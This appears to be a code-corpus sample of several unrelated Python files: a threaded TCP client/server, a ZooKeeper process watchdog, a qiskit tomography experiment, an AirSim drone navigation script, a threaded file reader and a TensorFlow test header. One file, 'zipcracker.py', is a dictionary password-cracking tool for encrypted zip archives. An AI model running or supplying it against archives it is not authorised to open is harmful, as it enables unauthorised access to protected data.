self.__onconnect_callbacks__.append(func)
def remove_onmessage_callback(self, func=None, index=0):
'''
Removes passed function OR index from list of callbacks
@param func (optional) the function to add. If None, will use 'index'
@param index the index of the function to remove. 'func' must be None.
'''
Server.__remove_func_from_list__(self.__onmessage_callbacks__, func, index)
def remove_onclose_callback(self, func=None, index=0):
'''
Removes passed function OR index from list of callbacks
@param func (optional) the function to add. If None, will use 'index'
@param index the index of the function to remove. 'func' must be None.
'''
Server.__remove_func_from_list__(self.__onclose_callbacks__, func, index)
def remove_onconnect_callback(self, func=None, index=0):
'''
Removes passed function OR index from list of callbacks
@param func (optional) the function to add. If None, will use 'index'
@param index the index of the function to remove. 'func' must be None.
'''
Server.__remove_func_from_list__(self.__onconnect_callbacks__, func, index)
def __remove_client__(self, client):
''' removes client from server's list of clients '''
self.clients.remove(client)
@staticmethod
def __remove_func_from_list__(listToModify, func=None, index=0):
''' logic to remove either a function or index from a list '''
if func is not None:
if func in listToModify:
listToModify.remove(func)
return True
else:
return False
if 0 <= index < len(listToModify):
listToModify.pop(index)
return True
else:
return False
'''
SENDING METHODS
'''
def broadcast(self, data):
'''
Send a message to all clients connected to the server
@param data the message to send - either json, string, or binary (can be different from what the server parses)
'''
for client in self.clients:
threading.Thread(target=client.send, args=(data,), name="Client {}:{} send".format(client.address, client.port)).start()
def sendTo(self, data, server_client=0):
'''
Send a message to a particular client
@param data the message to send - either json, string, or binary
@param server_client can be client index or the client object you wish to send to
'''
if type(server_client) is type(0):
if server_client < len(self.clients):
self.clients[server_client].send(data)
return
else:
raise IndexError("Passed index {} but only {} clients exist".format(server_client, len(self.clients)))
if isinstance(server_client, Client):
server_client.send(data)
def __del__(self):
self.stop()
def stop(self):
'''
Stops the server. Disconnects clients. Ends all threads.
Use this to cleanly close everything.
'''
if not self.STOP:
self.STOP = True
for client in self.clients:
client.conn.shutdown(1)
client.close()
print("[Server {}] Stopping... ({} second timeout)".format(self.port, Server.PORT_IN_USE_TIMEOUT))
'''
TCP Client class
Instantiating and calling connect() starts a TCP client connection to the passed address and port
Also used by Server
'''
class Client:
def __init__(self, address, port, controlledByServer=False, connection=None, messageDataType="json", byteOrder="little", sendMostRecent=False, autoReconnect=False):
'''
Creates an object for threaded management of a TCP connection with a server. (can also be used by a server to manage clients)
call myClient.connect() to establish connection with server and begin receiving messages
@param string address the device address to connect to. eg: "192.168.1.55"
@param int port the server port to connect to. eg: 6000
@param bool controlledByServer whether the instance is being managed by a server. False by default
@param Socket connection if controlled by a server, this is the socket connection object to a client. None by default
@param string messageDataType 'json' or 'string' to automatically parse incoming messages as either of these. Otherwise will use binary
@param string byteOrder 'little' or 'big' endian depending on the headers being used.
@param bool sendMostRecent whether to drop accumulated packets and only send the most recent messages
@param bool autoReconnect automatically reconnect to the server if connection is lost. Forced to False if controlled by server
'''
# connection and message passing type
self.address = address
self.port = port
self.conn = connection
self.messageType = messageDataType
self.byteOrder = byteOrder
# state management
self.STOP = False
self.listener = None
# listeners
self.onMessage = []
self.onClose = []
self.onConnect = []
# options
self.autoReconnect = False
self.__can_connect__ = False
self.sendMostRecent = sendMostRecent
if self.conn is None or controlledByServer is False:
self.__can_connect__ = True
self.autoReconnect = autoReconnect
else:
self.listener = threading.Thread(target=self.__listen__, name="Client of {}:{} listener".format(self.address, self.port))
'''
CONTROL METHODS
'''
def connect(self):
'''
Starts connection with server.
'''
if self.__can_connect__:
self.STOP = False
self.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.conn.connect((self.address, self.port))
self.listener = threading.Thread(target=self.__listen__, name="Client of {}:{} listener".format(self.address, self.port))
self.listener.start()
threading.Thread(target=self.__onconnect_caller__, name="Client {}:{} onconnect callbacks".format(self.address, self.port)).start()
else:
raise Exception("Cannot establish client connection inside a server")
def __listen__(self):
''' Constantly listens for messages, automatically parses as json or string, and starts callback threads '''
while not self.STOP:
if (self.conn):
try:
# Get Message Header
self.conn.settimeout(3)
datalen = int.from_bytes(self.conn.recv(4), self.byteOrder)
data = self.conn.recv(datalen)
# Parse Data into a message based self.messageType
msg = data
if self.messageType == "json":
msg = Client.parseJson(data)
elif self.messageType == "string":
msg = msg.decode("utf-8")
# Callback
threading.Thread(target=self.__onmessage_caller__, args=(msg,), name="Client {}:{} onmessage_callbacks".format(self.address, self.port)).start()
except socket.timeout:
continue
except ConnectionResetError:
self.close()
continue
except ConnectionAbortedError:
self.close()
continue
except:
print("[Client {}:{}] Exception in read loop \n\t{}".format(self.address, self.port, sys.exc_info()))
self.close()
continue
else:
self.close()
# Close out
self.conn.close()
def send(self, message):
''' Sends a message '''
# TODO: make this into a queue
as_bytes = None
as_string = None
# Convert to bytes
if type(message) is type({}):
as_string = json.dumps(message)
if type(message) is type(""):
as_string = message
if type(message) is type(b''):
as_bytes = message
if as_string is not None:
as_bytes = as_string.encode("utf-8")
# Add Header
if (self.conn is not None and not self.STOP):
# Get Message Length
messageLength = (len(as_bytes)).to_bytes(4, byteorder=self.byteOrder, signed=False)
# SEND
try:
self.conn.send(bytes(messageLength)) # 4 bytes with the size of the image
self.conn.send(bytes(as_bytes)) # If throwing error, check if numpy array is converting to byte array. May need to call bytes(data.tobytes()) ERROR: only integer arrays with one element can be...
except TypeError:
tb = sys.exc_info()[2]
print("[Client {}:{}] Exception sending data {}\n\t{} {}".format(self.address, self.port, sys.exc_info()[1], tb.tb_frame.f_code.co_filename, tb.tb_lineno))
# except ConnectionAbortedError:
# self.close()
# except ConnectionResetError:
# self.close()
# except BrokenPipeError:
# self.close()
# except OSError:
# self.close()
except:
self.close()
def close(self):
if not self.STOP:
self.STOP = True
# Call callbacks
threading.Thread(target=self.__onclose_caller__, name="Client {}:{} close callbacks".format(self.address, self.port)).start()
# Autoreconnect
if (self.autoReconnect):
time.sleep(1)
self.connect()
'''
CALLBACK METHODS
'''
def __onmessage_caller__(self, message):
''' Calls all of the subscribed listeners whenever a client gets a message '''
for callback in self.onMessage:
callback(message)
def __onclose_caller__(self):
''' Calls all of the subscribed listeners whenever disconnected from server '''
for callback in self.onClose:
callback(self)
def __onconnect_caller__(self):
''' Calls all subscribers when (re)connected to server '''
for callback in self.onConnect:
callback(self)
def add_onmessage_callback(self, func):
'''
Adds passed function to list of callback functions.
All functions will be called when client receives a message from the server
function will be called in the order they are added
@param func the function to add. eg: myClient.add_onmessage_callback(dosomething)
'''
self.onMessage.append(func)
def add_onclose_callback(self, func):
'''
Adds passed function to list of callback functions.
All functions will be called when disconnected from server.
functions will be called in the order they are added
@param func the function to add. eg: myClient.add_onclose_callback(dosomething)
'''
self.onClose.append(func)
def add_onconnect_callback(self, func):
'''
Adds passed function to list of callback functions.
All functions will be called when connection with server is established or re-established.
functions will be called in the order they are added
@param func the function to add. eg: myClient.add_onconnect_callback(dosomething)
'''
self.onConnect.append(func)
def remove_onmessage_callback(self, func=None, index=0):
'''
Removes passed function OR index from list of callbacks
@param func (optional) the function to add. If None, will use 'index'
@param index the index of the function to remove. 'func' must be None.
'''
Client.__remove_func_from_list__(self.onMessage, func, index)
def remove_onclose_callback(self, func=None, index=0):
'''
Removes passed function OR index from list of callbacks
@param func (optional) the function to add. If None, will use 'index'
@param index the index of the function to remove. 'func' must be None.
'''
Client.__remove_func_from_list__(self.onClose, func, index)
def remove_onconnect_callback(self, func=None, index=0):
'''
Removes passed function OR index from list of callbacks
@param func (optional) the function to add. If None, will use 'index'
@param index the index of the function to remove. 'func' must be None.
'''
Client.__remove_func_from_list__(self.onConnect, func, index)
'''
HELPER
'''
@staticmethod
def __remove_func_from_list__(listToModify, func=None, index=0):
''' logic to remove either a function or index from a list '''
if func is not None:
if func in listToModify:
listToModify.remove(func)
return True
else:
return False
if 0 <= index < len(listToModify):
listToModify.pop(index)
return True
else:
return False
@staticmethod
def parseJson(data):
data = data.decode("utf-8")
msg = json.loads(data)
return msg
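# --- Minimal loopback usage sketch (added for illustration, not part of the
# original module). It assumes TCP port 6000 is free on this machine and only
# shows the callback flow described in the docstrings above.
if __name__ == '__main__':
    def show(message):
        print("server received:", message)

    demo_server = Server("127.0.0.1", 6000)
    demo_server.add_onmessage_callback(show)
    demo_server.start()
    time.sleep(0.5)  # give the accept loop time to bind and listen

    demo_client = Client("127.0.0.1", 6000)
    demo_client.connect()
    demo_client.send({"hello": "world"})  # sent as a 4-byte length header plus JSON payload

    time.sleep(1)  # give the listener threads time to deliver the message
    demo_client.close()
    demo_server.stop()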
|
zipcracker.py
|
import os
import optparse
import zipfile
from pyfiglet import figlet_format
from threading import Thread
os.system("clear")
print (" MYANMAR ANONYMOUS FAMILY. ")
print (figlet_format("ZIP CRACKER"))
print ("___________________________________")
print ("Author : BhonePyae")
print ("Email : bptz393@gmail.com")
print ("___________________________________")
def extract_zip(zFile, password):
try:
pwd_bytes = password.encode('utf-8')
zFile.extractall(pwd=pwd_bytes)
print ("[+] Password Found: " + password + '\n')
except:
pass
def Main():
parser = optparse.OptionParser("useage &prog "+\
"-f <zipfile> -d <dictionary>")
parser.add_option('-f', dest='zname', type='string',\
help='specify zip file')
parser.add_option('-d', dest='dname', type='string',\
help='specify dictionary file')
(options, arg) = parser.parse_args()
if (options.zname is None) or (options.dname is None):
print (parser.usage)
exit(0)
else:
zname = options.zname
dname = options.dname
zFile = zipfile.ZipFile(zname)
passFile = open(dname)
for line in passFile.readlines():
password = line.strip('\n')
t = Thread(target=extract_zip, args=(zFile, password))
t.start()
if __name__ == '__main__':
Main()
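# Example invocation (the archive and wordlist names below are hypothetical):
#     python zipcracker.py -f protected.zip -d wordlist.txt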
|
watchdog.py
|
# -*- coding: utf-8 -*-
from kazoo.client import KazooClient
import os
import sys
import logging
import time
import signal
from multiprocessing import Process
main_dir = "/root/V3/project/"
signal_dir = '/signal/huanqiunews'
task_type = "huanqiunews"
def run_proc():
os.chdir(main_dir +"huanqiunews/huanqiunews/spiders")
#arg = ["HELLO","crawl", "spider_" + task_type,"--nolog"]
arg = ["HELLO","crawl", "spider_" + task_type]
os.execvp("scrapy",arg)
def run_wait(a,b):
try:
os.waitpid(-1, os.WNOHANG)
except Exception,e:
print "no child"
signal.signal(signal.SIGCHLD, run_wait)
watchPid = []
for i in range(1,len(sys.argv)):
watchPid.append(int(sys.argv[i]))
hosts_list = ['123.206.89.123:2181', '123.207.157.135:2181', '118.89.234.46:2181']
signal_dic = {"stop":signal.SIGKILL, "start":signal.SIGCONT, "pause":signal.SIGSTOP, "continue":signal.SIGCONT}
zk = KazooClient(hosts = hosts_list)
logging.basicConfig()
zk.start()
print "watch dog working"
stop_flag = False
@zk.ChildrenWatch(signal_dir)
def signal_watch(children):
if len(children) != 0:
global watchPid
for pid in watchPid:
os.kill(pid, signal_dic[children[0]])
if children[0] == "stop":
global stop_flag
stop_flag = True
def check(pid):
global stop_flag
if stop_flag == True:
sys.exit(0)
try:
os.kill(pid, 0)
return pid
except Exception: # check failed: process is gone, restart it
p = Process(target=run_proc)
p.start()
return p.pid
while True:
print "begin check"
global stop_flag
if stop_flag == True:
sys.exit(0)
for pid in watchPid:
newpid = check(pid)
if stop_flag == True:
sys.exit(0)
if newpid != pid:
print "new process"
watchPid.remove(pid)
watchPid.append(newpid)
time.sleep(5)
|
compare_Walternating_sgd_1layers.py
|
import qiskit
import numpy as np
import sys
sys.path.insert(1, '../')
import qtm.base, qtm.constant, qtm.onequbit, qtm.nqubit, qtm.fubini_study, qtm.encoding
import importlib
import multiprocessing
importlib.reload(qtm.base)
importlib.reload(qtm.constant)
importlib.reload(qtm.onequbit)
importlib.reload(qtm.nqubit)
importlib.reload(qtm.fubini_study)
def run_walternating(num_layers, num_qubits):
thetas = np.ones(int(num_layers*num_qubits / 2) + 3 * num_layers * num_qubits)
psi = 2*np.random.rand(2**num_qubits)-1
psi = psi / np.linalg.norm(psi)
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc.initialize(psi, range(0, num_qubits))
loss_values = []
thetass = []
for i in range(0, 400):
if i % 20 == 0:
print('W_alternating: (' + str(num_layers) + ',' + str(num_qubits) + '): ' + str(i))
grad_loss = qtm.base.grad_loss(
qc,
qtm.nqubit.create_Walternating_layerd_state,
thetas, num_layers = num_layers)
thetas -= qtm.constant.learning_rate*(grad_loss)
thetass.append(thetas.copy())
qc_copy = qtm.nqubit.create_Walternating_layerd_state(qc.copy(), thetas, num_layers)
loss = qtm.base.loss_basis(qtm.base.measure(qc_copy, list(range(qc_copy.num_qubits))))
loss_values.append(loss)
traces = []
fidelities = []
for thetas in thetass:
# Get |psi~> = U_target|000...>
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc = qtm.nqubit.create_Walternating_layerd_state(qc, thetas, num_layers = num_layers).inverse()
psi_hat = qiskit.quantum_info.Statevector.from_instruction(qc)
# Calculate the metrics
trace, fidelity = qtm.base.get_metrics(psi, psi_hat)
traces.append(trace)
fidelities.append(fidelity)
print('Writing ... ' + str(num_layers) + ' layers, ' + str(num_qubits) + ' qubits')
np.savetxt("../../experiments/tomography/tomography_walternating_" + str(num_layers) + "/" + str(num_qubits) + "/loss_values.csv", loss_values, delimiter=",")
np.savetxt("../../experiments/tomography/tomography_walternating_" + str(num_layers) + "/" + str(num_qubits) + "/thetass.csv", thetass, delimiter=",")
np.savetxt("../../experiments/tomography/tomography_walternating_" + str(num_layers) + "/" + str(num_qubits) + "/traces.csv", traces, delimiter=",")
np.savetxt("../../experiments/tomography/tomography_walternating_" + str(num_layers) + "/" + str(num_qubits) + "/fidelities.csv", fidelities, delimiter=",")
if __name__ == "__main__":
# creating thread
num_layers = [1]
num_qubits = [2, 3, 4, 5, 6]
t_walternatings = []
for i in num_layers:
for j in num_qubits:
t_walternatings.append(multiprocessing.Process(target = run_walternating, args=(i, j)))
for t_walternating in t_walternatings:
t_walternating.start()
for t_walternating in t_walternatings:
t_walternating.join()
print("Done!")
|
auto_mode_turn_yaw_V1.py
|
import airsim
import numpy as np
import math
from math import cos,sin,radians,degrees
import os
import pprint
import cv2, time, timeit, threading, sys
import random
import my_fuzzyController
def adjYaw():
global tag_time
while True:
tag_time += 1
time.sleep(1)
"""--------------------------- GET DRONE INFO ----------------------------------"""
def get_position():
PosNow = client.getMultirotorState().kinematics_estimated.position
return list((round(PosNow.x_val,3), round(PosNow.y_val,3), round(PosNow.z_val,3)))
def get_velocity():
v = client.getMultirotorState().kinematics_estimated.linear_velocity
return list((round(v.x_val,2),round(v.y_val,2),round(v.z_val,2)))
def get_attitude():
pitch, roll, yaw = airsim.to_eularian_angles(client.simGetVehiclePose().orientation)
return list((degrees(pitch),degrees(roll),degrees(yaw)))
"""----------------------------- CONTROL STEP ----------------------------"""
def forward():
attitude = get_attitude()
V = frd2ned_in_velocity(theta=-attitude[2], v_front=speed, v_right=0)
client.moveByVelocityZAsync(V[0],V[1],alt,duration, airsim.DrivetrainType.MaxDegreeOfFreedom, airsim.YawMode(False, attitude[2]))#.join()
time.sleep(delay)
def backword():
attitude = get_attitude()
V = frd2ned_in_velocity(theta=-attitude[2], v_front=-speed, v_right=0)
client.moveByVelocityZAsync(V[0],V[1],alt,duration, airsim.DrivetrainType.MaxDegreeOfFreedom, airsim.YawMode(False, attitude[2])).join()
time.sleep(delay)
def left(v):
attitude = get_attitude()
V = frd2ned_in_velocity(theta=-attitude[2], v_front=0, v_right=-v)
client.moveByVelocityZAsync(V[0],V[1],alt,duration, airsim.DrivetrainType.MaxDegreeOfFreedom, airsim.YawMode(False, attitude[2])).join()
time.sleep(delay)
def right(v):
attitude = get_attitude()
V = frd2ned_in_velocity(theta=-attitude[2], v_front=0, v_right=v)
client.moveByVelocityZAsync(V[0],V[1],alt,duration, airsim.DrivetrainType.MaxDegreeOfFreedom, airsim.YawMode(False, attitude[2])).join()
time.sleep(delay)
def stop():
attitude = get_attitude()
client.moveByVelocityZAsync(0,0,alt,duration, airsim.DrivetrainType.MaxDegreeOfFreedom, airsim.YawMode(False, attitude[2])).join()
def turn_left():
attitude = get_attitude()
attitude[2] -= 3 + random.randint(0, 5)
print('cur_yaw: ',attitude[2])
client.moveByVelocityZAsync(0,0,alt,duration, airsim.DrivetrainType.MaxDegreeOfFreedom, airsim.YawMode(False,attitude[2]))#.join()
def turn_right():
attitude = get_attitude()
attitude[2] += 3 + random.randint(0, 5)
print('cur_yaw: ',attitude[2])
client.moveByVelocityZAsync(0,0,alt,duration, airsim.DrivetrainType.MaxDegreeOfFreedom, airsim.YawMode(False, attitude[2]))#.join()
def turn_up():
global alt
attitude = get_attitude()
alt = alt - 0.5
print('turn_up')
client.moveByVelocityZAsync(0,0,alt,duration, airsim.DrivetrainType.MaxDegreeOfFreedom, airsim.YawMode(False, attitude[2])).join()
def Turn_Yaw(heading):
#print('turn_yaw')
client.moveByVelocityZAsync(0,0,alt,3, airsim.DrivetrainType.MaxDegreeOfFreedom, airsim.YawMode(False, heading)).join()
"""----------------------------------- OTHER FUNCTION -------------------------------------------"""
def frd2ned_in_velocity(theta,v_front,v_right):
v_frd = np.array([v_front,v_right]).reshape(2,1)
rotation_matrix = np.array([cos(radians(theta)),-sin(radians(theta)),sin(radians(theta)),cos(radians(theta))]).reshape(2,2)
v_ned = np.dot(rotation_matrix,v_frd).reshape(-1,)
#print('------------------------------------------')
#print('v_ned: ',v_ned)
return v_ned
# Set yaw
def yawDegree(now, goal):
# Local frame
delta_x = (goal[0] - now[0])
delta_y = (goal[1] - now[1])
theta = np.rad2deg(np.arctan2(delta_y,delta_x))
return round(theta,1)
def SetWaypoint(All_points_name):
wp = []
for Obj_Name in All_points_name:
Waypoint = client.simGetObjectPose(Obj_Name).position
# Check
if not (math.isnan(Waypoint.x_val) and math.isnan(Waypoint.y_val)):
print(">> {wp_name:} Check: OK!".format(wp_name=Obj_Name))
else:
print(">> {wp_name:} Nan detected, re-access.".format(wp_name=Obj_Name))
while (math.isnan(Waypoint.x_val) or math.isnan(Waypoint.y_val)):
Waypoint = client.simGetObjectPose(Obj_Name).position
wp.append([Waypoint.x_val, Waypoint.y_val, alt])
return wp
def set_waypoints_from_txt(path):
try:
wp = []
f = open(path,'r')
while 1:
line = f.readline()
if line != '':
text = line.split(' ')
wp.append( [ float(text[0]), float(text[1]), float(text[2]) ] )
print(text)
else:
break
f.close()
return wp
except Exception as e:
print(e)
sys.exit()
#---------------- GLOBAL VARIABLES --------------
alt = -4
cur_yaw = 0 # heading :+x axis
duration = 0.01
speed = 3
delay = 0.1
tag_time = 0
th2 = threading.Thread(target=adjYaw)
th2.setDaemon(True)
# the index of waypoints list
wp_i = 0
h, w = 480, 640
eq_w = int(w/6)
center_L = [ int(w/8) * 2, int(h/2) ] # [column, row]
center_M = [ int(w/8) * 4, int(h/2) ]
center_R = [ int(w/8) * 6, int(h/2) ]
shift = 80#120 # (up + down) = (shift/2, shift/2)
# obstacle position in middle, right, left ROI
L_i, L_j = None, None
R_i, R_j = None, None
M_i, M_j = None, None
# Fuzzy system
fz = my_fuzzyController.FuzzyControl()
fz.pre_fzprocess()
#----------------- QUADROTOR CLIENT --------------
client = airsim.MultirotorClient()
client.confirmConnection()
client.enableApiControl(True)
client.armDisarm(True)
print(client.getMultirotorState().kinematics_estimated.orientation)
""" ================== Read the waypoints from waypoints.txt =================="""
# Set waypoint
#wp = set_waypoints_from_txt('waypoints/waypoints.txt')
""" ================== Read the waypoints from airsim object Wp_* =================="""
Waypoints_name = client.simListSceneObjects("Wp_.*")
print(">> Waypoint list: {ww:}".format(ww=Waypoints_name))
wp = SetWaypoint(Waypoints_name)
# Set home
home = client.getMultirotorState().kinematics_estimated.position
print('>> Home_(x, y, alt) -> ({xx}, {yy}, {zz})'.format(xx=home.x_val, yy=home.y_val, zz=home.z_val))
# Add home into wp-list for RTL.
print (">> Add Home into wp-list for RTL ...")
wp.append([home.x_val, home.y_val, alt])
print(">> {n:} Waypoints: [x, y, alt]".format(n=len(wp)))
for i in range(len(wp)):
print('\t[{i:}]: {wp}'.format(i=i, wp=wp[i]))
print('take off')
client.takeoffAsync()
print('take off to alt=',alt)
client.moveToZAsync(alt, velocity=1).join()
att = get_attitude()
print('pitch: {} deg, roll: {} deg, yaw: {} deg'.format(att[0],att[1],att[2]))
GPS = get_position()
Heading = yawDegree(GPS, wp[wp_i])
Turn_Yaw(Heading)
th2.start()
try:
while wp_i < len(wp):
#t = timeit.default_timer()
responses = client.simGetImages([airsim.ImageRequest("0", airsim.ImageType.DepthPlanner, pixels_as_float=True, compress=False),
airsim.ImageRequest("1", airsim.ImageType.Scene, False, False)])
if not responses:
client.moveByVelocityAsync(vx=0, vy=0, vz=0, duration=1).join()
print("** Wait for data. **")
continue
try:
# For depth
response = responses[0]
img1d = np.array(response.image_data_float, dtype=float)
temp = img1d
temp2 = np.reshape(temp, (responses[0].height, responses[0].width))
# Depth data transformating
img1d = img1d * 4 + 20
img1d[img1d>255] = 255
img2d = np.reshape(img1d, (responses[0].height, responses[0].width))
depth = np.array(img2d,dtype=np.uint8)
color = responses[1]
imgcolor = np.frombuffer(color.image_data_uint8, dtype=np.uint8)
imgcolor = imgcolor.reshape(responses[1].height, responses[1].width, -1)
if imgcolor.shape[2] == 4:
imgcolor = cv2.cvtColor(imgcolor,cv2.COLOR_RGBA2BGR)
depth = cv2.cvtColor(depth,cv2.COLOR_GRAY2BGR)
depth = cv2.addWeighted(imgcolor, 0.75, depth, 0.25, 0)
except Exception as e:
#print(e)
pass
GPS = get_position()
V_global = get_velocity()
Heading = yawDegree(GPS, wp[wp_i])
"""======================== AVOID DECITION ================================="""
ROI_M = temp2[(center_M[1]-shift):(center_M[1]+shift),(center_M[0]-eq_w):(center_M[0]+eq_w)] *100 # [cm]
dx_M, dy_M = np.where(ROI_M < 1000) # cm
if dx_M.any():
M_i = int(np.median(dx_M))
M_j = int(np.median(dy_M))
x = ((center_M[0]-eq_w) + (center_M[0] + eq_w))//2 - ((center_M[0]-eq_w) + M_i)
y = ((center_M[1]-shift) + (center_M[1] +shift))//2 - ((center_M[1]-shift) + M_j)
z = ROI_M[M_i,M_j]
print('------------------------------------------------------------------------------------')
print(">> Recieve data: x= {}, y= {}, Dist= {:.2f} cm".format(x, y, z))
vx, vy, vz, turn_yaw, cost_t = fz.fzprocess(delta_x = x, delta_y = y, distance = z)
print(">> Defuzzy data: vx= {:.2f}, vy= {:.2f}, vz= {:.2f}, turn_yaw= {:.2f}".format(vx, vy, vz, turn_yaw))
attitude = get_attitude()
client.moveByVelocityAsync(vx=0, vy=0, vz=0, duration=0.5, drivetrain=airsim.DrivetrainType.MaxDegreeOfFreedom, yaw_mode=airsim.YawMode(False, attitude[2]+turn_yaw))
if tag_time < 3:
GPS_prime = frd2ned_in_velocity(theta=turn_yaw, v_front=GPS[0], v_right=GPS[1])
GPS = get_position()
Heading = yawDegree(GPS,GPS_prime)
client.moveToPositionAsync(GPS_prime[0], GPS_prime[1], GPS[2], velocity=speed, yaw_mode=airsim.YawMode(False, Heading))
#attitude = get_attitude()
#V = frd2ned_in_velocity(theta=-attitude[2], v_front=1, v_right=0)
cv2.putText(img=depth, text='{:.2f} cm'.format(ROI_M[M_i,M_j]), org=((center_M[0]-50), (center_L[1]+200)), fontFace=cv2.QT_FONT_BLACK, color=(255, 255, 0), fontScale=1, thickness=1)
cv2.circle(depth, (M_j+(center_M[0]-eq_w),M_i+(center_M[1]-shift)), 4, (255, 255, 0), -1)
else:
tag_time = 0
GPS = get_position()
Heading = yawDegree(GPS, wp[wp_i])
cv2.putText(img=depth, text='safe', org=((center_M[0]-50), (center_M[1]+200)), fontFace=cv2.FONT_HERSHEY_COMPLEX, color=(255, 255, 0), fontScale=1, thickness=1)
client.moveToPositionAsync(wp[wp_i][0], wp[wp_i][1], wp[wp_i][2], velocity=speed, yaw_mode=airsim.YawMode(False, Heading))
dist_to_waypoint = round((round((GPS[0] - wp[wp_i][0]),3)**2 + round((GPS[1] - wp[wp_i][1]),3)**2),3)**0.5
# Check if reach the waypoint(x,y)
if dist_to_waypoint <= 1:
stop()
print(">> Arrived at wp{Nwp:}({x:}, {y:}, {z:})!".format(Nwp=wp_i+1, x=GPS[0], y=GPS[1], z=GPS[2]))
if wp_i >= len(wp) -1:
print('\n ==== Mission Complete ! ====')
Turn_Yaw(0)
print(">> LAND")
client.landAsync().join()
client.armDisarm(False)
cv2.destroyAllWindows()
break
wp_i += 1
Heading = yawDegree(GPS, wp[wp_i])
Turn_Yaw(Heading)
cv2.putText(img=depth, text='Pos[x,y,z]: [{:.1f}, {:.1f}, {:.1f}]'.format(GPS[0],GPS[1],GPS[2]), org=(10, 18), fontFace=cv2.FONT_HERSHEY_SIMPLEX, color=(0, 0, 0), fontScale=0.5, thickness=1)
cv2.putText(img=depth, text='V_global[x,y,z]: [{:.1f}, {:.1f}, {:.1f}]'.format(V_global[0],V_global[1],V_global[2]), org=(10, 40), fontFace=cv2.FONT_HERSHEY_SIMPLEX, color=(0, 0, 0), fontScale=0.5, thickness=1)
cv2.putText(img=depth, text='way_point: {}/{}, dist2waypoint: {:.2f} m'.format(wp_i+1, len(wp), dist_to_waypoint), org=(10, 60), fontFace=cv2.FONT_HERSHEY_SIMPLEX, color=(0, 0, 0), fontScale=0.5, thickness=1)
cv2.rectangle(depth, ((center_M[0]-eq_w), (center_M[1]-shift)), ((center_M[0]+eq_w), (center_M[1]+shift)), (255, 255, 0), 2)
cv2.imshow('depth',depth)
#cv2.imshow("color", imgcolor)
key = cv2.waitKey(1) & 0xFF
if key == 27 or key == ord('q'):
cv2.destroyAllWindows()
break
#print('time:{:.2f} sec'.format(timeit.default_timer()-t))
except Exception as e:
print(e)
client.reset()
finally:
cv2.destroyAllWindows()
client.reset()
|
threaded_reader.py
|
import queue
import threading
from ...formats import dictset
def threaded_reader(items_to_read: list, blob_list, reader):
"""
Speed up reading sets of files - such as multiple days' worth of log-per-day
files.
Each file is read in a separate thread (up to 8 threads); reading a single
file through this function won't show any improvement.
NOTE:
This compromises record ordering to achieve speed increases
Parameters:
items_to_read: list of strings
The names of the blobs to read
blob_list: list
The full blob list, passed through to the reader's _read_blob call
reader: Reader
The Reader object to perform the reading operations
Yields:
dictionary (or string)
"""
thread_pool = []
def _thread_process():
"""
The process inside the threads.
1) Get any files off the file queue
2) Read the file in chunks
3) Put a chunk onto a reply queue
"""
try:
source = source_queue.pop(0)
except IndexError:
source = None
while source:
source_reader = reader._read_blob(source, blob_list)
for chunk in dictset.page_dictset(source_reader, 256):
reply_queue.put(chunk) # this will wait until there's a slot
try:
source = source_queue.pop(0)
except IndexError:
source = None
source_queue = items_to_read.copy()
# scale the number of threads; if we start more threads than there are
# files to read, some threads would never receive any work
t = min(len(source_queue), reader.thread_count, 8)
reply_queue: queue.Queue = queue.Queue(t * 8)
# start the threads
for _ in range(t):
thread = threading.Thread(target=_thread_process)
thread.daemon = True
thread.start()
thread_pool.append(thread)
# when the threads are all complete and all the records have been read from
# the reply queue, we're done
while any([t.is_alive() for t in thread_pool]) or not (reply_queue.empty()):
try:
# don't wait forever
records = reply_queue.get(timeout=10)
yield from records
except queue.Empty: # pragma: no cover
pass # the most likely reason for getting here is a race condition
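# The block below is an illustrative, self-contained sketch of the same
# producer/consumer pattern threaded_reader uses: worker threads pop sources
# from a shared list, push pages of records onto a bounded reply queue, and
# the caller drains that queue as a generator. It does not use the
# Reader/_read_blob interface above; `fake_read_blob`, `demo_threaded_read`
# and the demo source names are invented purely for this example.
if __name__ == "__main__":  # pragma: no cover
    import queue    # repeated here so the sketch stands alone
    import threading

    def fake_read_blob(name):
        # stand-in for reader._read_blob: yield a handful of records per "file"
        for i in range(5):
            yield {"file": name, "record": i}

    def demo_threaded_read(sources, workers=4, page_size=2):
        sources = list(sources)
        replies: queue.Queue = queue.Queue(workers * 8)

        def worker():
            while True:
                try:
                    source = sources.pop(0)
                except IndexError:
                    return  # no more work for this thread
                page = []
                for record in fake_read_blob(source):
                    page.append(record)
                    if len(page) == page_size:
                        replies.put(page)  # blocks if the reply queue is full
                        page = []
                if page:
                    replies.put(page)

        threads = [
            threading.Thread(target=worker, daemon=True)
            for _ in range(min(workers, len(sources)))
        ]
        for t in threads:
            t.start()
        # drain the reply queue until all workers have finished
        while any(t.is_alive() for t in threads) or not replies.empty():
            try:
                yield from replies.get(timeout=1)
            except queue.Empty:
                pass

    for row in demo_threaded_read(["day1.log", "day2.log", "day3.log"]):
        print(row)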
|
random_shuffle_queue_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.Queue."""
import random
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
@test_util.run_v1_only("RandomShuffleQueue removed from v2")
class RandomShuffleQueueTest(test.TestCase):
def setUp(self):
# Useful for debugging when a test times out.
super(RandomShuffleQueueTest, self).setUp()
tf_logging.error("Starting: %s", self._testMethodName)
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
def tearDown(self):
super(RandomShuffleQueueTest, self).tearDown()
